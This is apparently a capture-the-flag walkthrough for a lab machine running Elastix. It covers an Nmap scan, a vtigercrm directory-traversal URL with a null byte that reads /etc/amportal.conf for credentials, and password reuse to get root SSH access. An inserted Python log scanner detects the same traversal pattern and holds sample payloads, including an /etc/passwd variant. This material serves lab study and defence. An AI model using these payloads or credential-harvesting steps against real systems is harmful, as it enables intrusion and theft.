Nmap Results →

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-08 14:39 EDT
Nmap scan report for 10.10.10.7
Host is up (0.11s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP PIPELINING STLS AUTH-RESP-CODE EXPIRE(NEVER) LOGIN-DELAY(0) UIDL IMPLEMENTATION(Cyrus POP3 server v2) TOP USER RESP-CODES
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: OK Completed RIGHTS=kxte UIDPLUS NO URLAUTHA0001 IMAP4 SORT=MODSEQ LIST-SUBSCRIBED IMAP4rev1 CATENATE SORT LITERAL+ NAMESPACE CONDSTORE BINARY LISTEXT THREAD=REFERENCES ANNOTATEMORE QUOTA THREAD=ORDEREDSUBJECT MAILBOX-REFERRALS X-NETSCAPE MULTIAPPEND CHILDREN UNSELECT ACL RENAME ID IDLE STARTTLS ATOMIC
443/tcp   open  ssl/https?
|_ssl-date: 2020-07-08T18:50:31+00:00; +4m48s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Browsing to the main HTTP page redirects us to the HTTPS version, where we are greeted with a login page. Trying some default credentials and some basic SQL injection techniques gets us nowhere, so let's just run searchsploit against the login service, which is Elastix here, and we find this exploit →

https://www.exploit-db.com/exploits/37637

So all we have to do now is browse to

10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

and we see a lot of jumbled text. Viewing the page source makes it more readable, and there we find a username, asterisk, and a password. Let's try it on every service.
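From the defender's side, the request above leaves a very recognisable trace in the Apache access log: a query parameter carrying `../` sequences and a `%00` null byte (which truncated the include path on the old PHP build this box runs). The following is an added example, not part of the original write-up, that parses Apache combined-format log lines and flags exactly that pattern. The log lines are constructed for the example; the third one mirrors the traversal-plus-null-byte request shown in the write-up, and the fourth is a URL-encoded variant that a naive grep for `../` on the raw log would miss, so values are percent-decoded and normalised before matching.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines for this example (not taken from the original write-up).
# Line 3 mirrors the traversal-plus-null-byte request pattern shown in the write-up;
# line 4 is a percent-encoded variant that a raw-text match for "../" would miss.
SAMPLE_LOG = """\
10.10.14.5 - - [08/Jul/2020:14:45:01 -0400] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.5 - - [08/Jul/2020:14:45:09 -0400] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.5 - - [08/Jul/2020:14:46:30 -0400] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.10.14.5 - - [08/Jul/2020:14:47:02 -0400] "GET /vtigercrm/graph.php?current_language=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Apache combined format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A ".." path component delimited by slashes (or at the start/end of the value).
TRAVERSAL_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')


def normalize(value):
    """parse_qsl has already percent-decoded the value once; decode a second time so
    double-encoded probes are caught too, and fold backslashes to slashes so
    Windows-style separators are matched by the same pattern."""
    return unquote(value).replace('\\', '/')


def classify_value(value):
    """Return the reasons a decoded query value looks like a file-inclusion probe."""
    reasons = []
    if TRAVERSAL_RE.search(value):
        reasons.append('directory traversal (..)')
    if '\x00' in value:
        reasons.append('embedded null byte (path truncation)')
    return reasons


def scan_access_log(text):
    """Parse Apache combined-format lines and return one finding per suspicious query parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real collector would count these separately
        query = urlsplit(m['target']).query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(normalize(raw))
            if reasons:
                findings.append({
                    'ip': m['ip'],
                    'time': m['ts'],
                    'status': int(m['status']),
                    'param': name,
                    'reasons': reasons,
                })
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} "
              f"param={f['param']}: {', '.join(f['reasons'])}")
```

Run against the sample it reports two hits, both on `current_language`; the first carries both the traversal and the null byte, the second only the traversal. A 200 status on such a request is the signal worth alerting on, since it means the include succeeded rather than being rejected. The same normalisation step (decode, then match on path components) is what an input validator on the application side should do before ever passing a request value to a file include.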

I tried to SSH into the IP with that username and password, but that didn't work. And let's now try the same password with the usernames admin and root and see if there is a possibility of password reuse, and gg, we got in with root.